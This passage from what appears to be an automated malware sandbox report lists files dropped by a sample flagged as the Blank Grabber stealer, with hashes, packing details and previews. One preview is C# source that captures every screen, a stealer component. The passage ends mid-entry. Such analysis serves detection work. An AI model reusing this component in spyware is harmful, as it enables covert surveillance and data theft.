                                                            SHA-512:5473FE57DC40AF44EDB4F8A7EFD68C512784649D51B2045D570C7E49399990285B59CFA6BCD25EF1316E0A073EA2A89FE46BE3BFC33F05E3333037A1FD3A6639
                                                            Malicious:false
                                                            Antivirus:
                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......6.3.r}]Ar}]Ar}]A{..Ap}]A .\@p}]A..\@q}]Ar}\AU}]A .X@~}]A .Y@z}]A .^@q}]A..Y@t}]A..^@s}]A..]@s}]A.._@s}]ARichr}]A........................PE..d......].........." .....@................................................................`.........................................................................................................................................................................UPX0....................................UPX1.....@.......:..................@...UPX2.................>..............@......................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..
                                                            Process:C:\Users\user\AppData\Local\Temp\Built.exe
                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):208224
                                                            Entropy (8bit):7.9214932539909775
                                                            Encrypted:false
                                                            SSDEEP:3072:5SI3oPlWLlPVVc5MpJa1pOjJnnioIZW8/Qf6bRXGKrs8qJjueW1LR/oSB6hetz:EIek5VC0FiHof6Z1rgJ63R/oS3
                                                            MD5:EAC369B3FDE5C6E8955BD0B8E31D0830
                                                            SHA1:4BF77158C18FE3A290E44ABD2AC1834675DE66B4
                                                            SHA-256:60771FB23EE37B4414D364E6477490324F142A907308A691F3DD88DC25E38D6C
                                                            SHA-512:C51F05D26FDA5E995FE6763877D4FCDB89CD92EF2D6EE997E49CC1EE7A77146669D26EC00AD76F940EF55ADAE82921DEDE42E55F51BD10D1283ECFE7C5009778
                                                            Malicious:false
                                                            Antivirus:
                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.p*..p*..p*......p*...+..p*.\.+..p*.../..p*......p*...)..p*...+..p*..p+.iq*......p*...*..p*.....p*...(..p*.Rich.p*.........PE..d......b.........." ... .....P...`..@....p................................................`..........................................6..4@...3.......0...........M...........v......................................@%..@...........................................UPX0.....`..............................UPX1.........p......................@....rsrc....P...0...H..................@..............................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..
                                                            Process:C:\Users\user\AppData\Local\Temp\Built.exe
                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):1513344
                                                            Entropy (8bit):7.9920512479873524
                                                            Encrypted:true
                                                            SSDEEP:24576:sIwbRDsNMNzLPC/nHNpC+ttWXt0R+F+yv+CdEtgMAEVQOx+wVxJ+MqarVMj0Kb7/:4RDJRav1+Y++yvREtzAK+wd+Fa2b
                                                            MD5:01988415E8FB076DCB4A0D0639B680D9
                                                            SHA1:91B40CFFCFC892924ED59DC0664C527FF9D3F69C
                                                            SHA-256:B101DB1DDD659B8D8FFD8B26422FDE848D5B7846E0C236F051FADB9412DE6E24
                                                            SHA-512:EAB0C3CA4578751A671BEB3DA650B5E971A79798DEB77472E42F43AA2BEA7434AD5228A8FDDBFFF051CE05054DBF3422D418F42C80BC3640E0E4F43A0CF2EBBE
                                                            Malicious:false
                                                            Antivirus:
                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......Q.D...*...*...*..+...*......*../...*......*..)...*.......*..+...*...+.H.*..'...*..*...*......*..(...*.Rich..*.........................PE..d...2.Ec.........." ...!. ......../...E.../...................................F...........`...........................................F.......F.d.....F.......B.X.............F.......................................E.@...........................................UPX0....../.............................UPX1..... ..../.....................@....rsrc.........F.....................@..............................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..
                                                            Process:C:\Users\user\AppData\Local\Temp\Built.exe
                                                            File Type:PE32+ executable (console) x86-64, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):630736
                                                            Entropy (8bit):6.409476333013752
                                                            Encrypted:false
                                                            SSDEEP:12288:3lPCcFDlj+gV4zOifKlOWVNcjfQww0S5JPgdbBC9qxbYG9Y:3lPCcvj+YYrfSOWVNcj1JS5JPgdbBCZd
                                                            MD5:9C223575AE5B9544BC3D69AC6364F75E
                                                            SHA1:8A1CB5EE02C742E937FEBC57609AC312247BA386
                                                            SHA-256:90341AC8DCC9EC5F9EFE89945A381EB701FE15C3196F594D9D9F0F67B4FC2213
                                                            SHA-512:57663E2C07B56024AAAE07515EE3A56B2F5068EBB2F2DC42BE95D1224376C2458DA21C965AAB6AE54DE780CB874C2FC9DE83D9089ABF4536DE0F50FACA582D09
                                                            Malicious:false
                                                            Antivirus:
                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........@.a.@.a.@.a..v..F.a..v....a..v..M.a..J..B.a.{.b.H.a.{.d.j.a.{.e.U.a.I..K.a.@.`...a..d...a....A.a..c.A.a.Rich@.a.................PE..d....~.^.........."..........2.................@.............................p.......4....`..................................................]..x.......Xy......pD...`...?...`..........T...................x...(.......................@............................text...C........................... ..`.rdata..:p.......r..................@..@.data............2...b..............@....pdata..pD.......F..................@..@.tls................................@....rsrc...Xy.......z..................@..@.reloc.......`.......V..............@..B................................................................................................................................................................................................
                                                            Process:C:\Users\user\AppData\Local\Temp\Built.exe
                                                            File Type:ASCII text
                                                            Category:dropped
                                                            Size (bytes):456
                                                            Entropy (8bit):4.447296373872587
                                                            Encrypted:false
                                                            SSDEEP:12:Bn9j9sxpCDPxfhKLiaE5cNH0u/OCIhjWO:B9jiWDpf025cNU7CIEO
                                                            MD5:4531984CAD7DACF24C086830068C4ABE
                                                            SHA1:FA7C8C46677AF01A83CF652EF30BA39B2AAE14C3
                                                            SHA-256:58209C8AB4191E834FFE2ECD003FD7A830D3650F0FD1355A74EB8A47C61D4211
                                                            SHA-512:00056F471945D838EF2CE56D51C32967879FE54FCBF93A237ED85A98E27C5C8D2A39BC815B41C15CAACE2071EDD0239D775A31D1794DC4DBA49E7ECFF1555122
                                                            Malicious:true
                                                            Yara Hits:
                                                            • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: C:\Users\user\AppData\Local\Temp\_MEI54322\rarreg.key, Author: Joe Security
                                                            Preview:RAR registration data.Blank-c.Stealer License.UID=e7ae0ee11c8703113d95.64122122503d95ca34668bc2ffb72bcf8579be24bc20f3cd84baaf.afcf62e30badf158ad0c60feb872189f288e79eb40c28ca0ab6407.3a46f47624f80a44a0e4d71ef4224075bf9e28fce340a29099d287.15690be6b591c3bb355e99d6d1b8ffcd69602cb8aaa6dedf268c83.55c1fb90c384a926139625f6c0cbfc57a96996fdb04075bf9e28fc.e340a29067e9237e333577d2c7f3ed1d0f63287f74c9e50c60d76d.b5915ff59f78103d48e0826658d72ba8813da4a649711057613203.
                                                            Process:C:\Users\user\AppData\Local\Temp\Built.exe
                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):24960
                                                            Entropy (8bit):7.386856021121088
                                                            Encrypted:false
                                                            SSDEEP:768:G1gl65HDUKap5ziI47GbiYiSyvd87PxWEY:Gql6HcziI47Gbi7SyV87Px
                                                            MD5:C9FF47314E1D3A71D0F6169A6ED919F4
                                                            SHA1:A90E8D82205C14660DECA06B6891DD48075BC993
                                                            SHA-256:AD50F036E4A00F5ED30C10C65ACD9A137D339D0390FF0E1B7643D2E25162F727
                                                            SHA-512:601A94DDEABE54C73EB42F7E185ABEB60C345B960E664B1BE1634EF90889707FD9C0973BE8E3514813C3C06CC96287BB715399B027DA1EB3D57243A514B4B395
                                                            Malicious:false
                                                            Antivirus:
                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........>.t^_d'^_d'^_d'W'.'\_d'.$e&\_d'.$a&R_d'.$`&V_d'.$g&Z_d'.$e&\_d'^_e'._d'.-e&[_d'.$i&__d'.$d&__d'.$.'__d'.$f&__d'Rich^_d'........................PE..d...C.Ec.........." ...!.0..........@.....................................................`......................................... ...L....................`..............l.......................................P...@...........................................UPX0....................................UPX1.....0.......(..................@....rsrc................,..............@..............................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..
                                                            Process:C:\Users\user\AppData\Local\Temp\Built.exe
                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):620920
                                                            Entropy (8bit):7.992965521692254
                                                            Encrypted:true
                                                            SSDEEP:12288:saB8v5+bga9wlXKszD7Wgx82MVEihme9ZC0vHLaApz/k4iNe3mZUY:sdR+sa9Oas3aT2Hi40OApDk4iNe33Y
                                                            MD5:FE5632AB5E7E35564059BD81FF07722F
                                                            SHA1:B45A9282D1E33585B07D92457A73B5907538DB83
                                                            SHA-256:4AE89A7A36C9FED607D38069635ACD1801C000CAC57558951175DB33D3F2EEAC
                                                            SHA-512:F79D00000EF7018BAFD69AE299AE1A06D36AA2498F64DCB33AA4EED66FD7E444EA524994C0469F3714431E6F7E5DBDAEBD31BCE253BEBF3ECBF693A85DD31133
                                                            Malicious:false
                                                            Antivirus:
                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........<T.S]:.S]:.S]:.Z%.._]:..&;.Q]:..&?.^]:..&>.[]:..&9.W]:../;.P]:.S];..]:..&2.R]:..&:.R]:..&.R]:..&8.R]:.RichS]:.........................PE..d...t.Ec.........." ...!. ...0...0..pO...@................................................`..........................................k...!...h.......`.......0.......................................................[..@...........................................UPX0.....0..............................UPX1..... ...@......................@....rsrc....0...`......."..............@......................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..
                                                            Process:C:\Users\user\AppData\Local\Temp\Built.exe
                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):295296
                                                            Entropy (8bit):7.985338181850214
                                                            Encrypted:false
                                                            SSDEEP:6144:mkUTqciTwGGelxb9MmqXLD7eUEZqR5TSaRXYMgZpYX/qUrOGuNI:LUZ4b9MPLGJZqkbZpurCVI
                                                            MD5:FA458852AA48B6D397AE5E4DCB624D07
                                                            SHA1:5B224FC953062EC4B5D4965C9B4B571C12B7F434
                                                            SHA-256:4472ADFE11946F3BCA0097EB3CA25F18101D97C152A82C9CB188B88F67B9DC4A
                                                            SHA-512:879784FA9215055937D28DDD8408C5D14A97B3699139A85405BC11D6EB56F42DBCE85BF76B911640887895DC405F43D51FDCF671107A5EA1AAE1F1669CEAB1E5
                                                            Malicious:false
                                                            Antivirus:
                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........e...l...l...l..|....l.0.m...l.0.i...l.0.h...l.0.o...l.>.m...l.cvm...l...m...l.>.a...l.>.l...l.>.....l.>.n...l.Rich..l.................PE..d...E.Ec.........." ...!.P..........0W... ................................................`..........................................{..X....y.......p.......................{......................................0c..@...........................................UPX0....................................UPX1.....P... ...F..................@....rsrc........p.......J..............@......................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..
                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):60
                                                            Entropy (8bit):4.038920595031593
                                                            Encrypted:false
                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                            Malicious:false
                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):60
                                                            Entropy (8bit):4.038920595031593
                                                            Encrypted:false
                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                            Malicious:false
                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):60
                                                            Entropy (8bit):4.038920595031593
                                                            Encrypted:false
                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                            Malicious:false
                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):60
                                                            Entropy (8bit):4.038920595031593
                                                            Encrypted:false
                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                            Malicious:false
                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):60
                                                            Entropy (8bit):4.038920595031593
                                                            Encrypted:false
                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                            Malicious:false
                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):60
                                                            Entropy (8bit):4.038920595031593
                                                            Encrypted:false
                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                            Malicious:false
                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):60
                                                            Entropy (8bit):4.038920595031593
                                                            Encrypted:false
                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                            Malicious:false
                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):60
                                                            Entropy (8bit):4.038920595031593
                                                            Encrypted:false
                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                            Malicious:false
                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):60
                                                            Entropy (8bit):4.038920595031593
                                                            Encrypted:false
                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                            Malicious:false
                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):60
                                                            Entropy (8bit):4.038920595031593
                                                            Encrypted:false
                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                            Malicious:false
                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):60
                                                            Entropy (8bit):4.038920595031593
                                                            Encrypted:false
                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                            Malicious:false
                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):60
                                                            Entropy (8bit):4.038920595031593
                                                            Encrypted:false
                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                            Malicious:false
                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):60
                                                            Entropy (8bit):4.038920595031593
                                                            Encrypted:false
                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                            Malicious:false
                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):60
                                                            Entropy (8bit):4.038920595031593
                                                            Encrypted:false
                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                            Malicious:false
                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):60
                                                            Entropy (8bit):4.038920595031593
                                                            Encrypted:false
                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                            Malicious:false
                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):60
                                                            Entropy (8bit):4.038920595031593
                                                            Encrypted:false
                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                            Malicious:false
                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                            Process:C:\Users\user\Desktop\47SXvEQ.exe
                                                            File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):5264896
                                                            Entropy (8bit):6.524291250916726
                                                            Encrypted:false
                                                            SSDEEP:98304:GpARPdrGXjhDyjAFUS2JqhqqGFMiKTzHPO4KYL8351+Zm+Dw3a5:GpMNGXJsOd2JqhqqLTrPO4/o351+ZzDF
                                                            MD5:C289921058A4B38BDBD1373A0CBB757D
                                                            SHA1:A70B63234511AFA4176A56AFA2FF5FEBED68E7E5
                                                            SHA-256:DBC71B99B03CBE4B779F17DB23017E22EC6CC8D85BCDAC55FB75B8412CD2B8D0
                                                            SHA-512:8092C0BC272799D7D08294EFC8D9AC08F3F05B7D3335E2426596A6D3AD0E0D89BBE45931CD267BA22CE49FF5A435443498D4DEB2F119075E76EE5492DAE4511C
                                                            Malicious:true
                                                            Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d....t}g.........."...........O.....@..........@..............................P...........`.....................................................<.............P...............P.x...............................(.......8...............x............................text............................... ..`.rdata...=.......>..................@..@.data...(.O......ZO.................@....pdata........P......NP.............@..@.00cfg........P......PP.............@..@.tls..........P......RP.............@....reloc..x.....P......TP.............@..B................................................................................................................................................................................................................................................................................................................................................
                                                            Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                            File Type:MSVC .res
                                                            Category:dropped
                                                            Size (bytes):652
                                                            Entropy (8bit):3.0950588631558915
                                                            Encrypted:false
                                                            SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5grypQak7Ynqq4VPN5Dlq5J:+RI+ycuZhNcakSoPNnqX
                                                            MD5:A12230B7F46905000A7F615B40F2E45E
                                                            SHA1:C784364D2EEC6C9241BD0E49223D746893CADDDA
                                                            SHA-256:0A005C4F3169432337C5AF0C7E85C66BB1F1FF611E53F35E537AA8F54648D3E8
                                                            SHA-512:8756BD46B9FD710EE1FF8CF38D31A291B96A927B4BC92D7DD14BEAF27183AE0C77569FF0E7752D19EF3EC79B2B32AA09C5FDA42C165657AA9F65BE3F2ED5AC36
                                                            Malicious:false
                                                            Preview:.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...s.y.w.b.4.g.e.u...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...s.y.w.b.4.g.e.u...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...
                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):1004
                                                            Entropy (8bit):4.154581034278981
                                                            Encrypted:false
                                                            SSDEEP:24:Jo4KMz04F03wykl4qk6oAuBGOUBrRmLW+7UCPa:Jo4hz0BAl4xBQ0XQCC
                                                            MD5:C76055A0388B713A1EABE16130684DC3
                                                            SHA1:EE11E84CF41D8A43340F7102E17660072906C402
                                                            SHA-256:8A3CD008E86A3D835F55F8415F5FD264C6DACDF0B7286E6854EA3F5A363390E7
                                                            SHA-512:22D2804491D90B03BB4B640CB5E2A37D57766C6D82CAF993770DCF2CF97D0F07493C870761F3ECEA15531BD434B780E13AE065A1606681B32A77DBF6906FB4E2
                                                            Malicious:false
                                                            Preview:.using System;..using System.Collections.Generic;..using System.Drawing;..using System.Windows.Forms;....public class Screenshot..{.. public static List<Bitmap> CaptureScreens().. {.. var results = new List<Bitmap>();.. var allScreens = Screen.AllScreens;.... foreach (Screen screen in allScreens).. {.. try.. {.. Rectangle bounds = screen.Bounds;.. using (Bitmap bitmap = new Bitmap(bounds.Width, bounds.Height)).. {.. using (Graphics graphics = Graphics.FromImage(bitmap)).. {.. graphics.CopyFromScreen(new Point(bounds.Left, bounds.Top), Point.Empty, bounds.Size);.. }.... results.Add((Bitmap)bitmap.Clone());.. }.. }.. catch (Exception).. {.. // Handle any exceptions here.. }.. }.... return results;..
                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (604), with no line terminators
                                                            Category:dropped
                                                            Size (bytes):607
                                                            Entropy (8bit):5.316867296069762
                                                            Encrypted:false
                                                            SSDEEP:12:p37Lvkmb6KOkqe1xBkrk+ikOfcWZEif5n:V3ka6KOkqeFkOfNEif5
                                                            MD5:565D150160225434A21D1CA34056B9AA
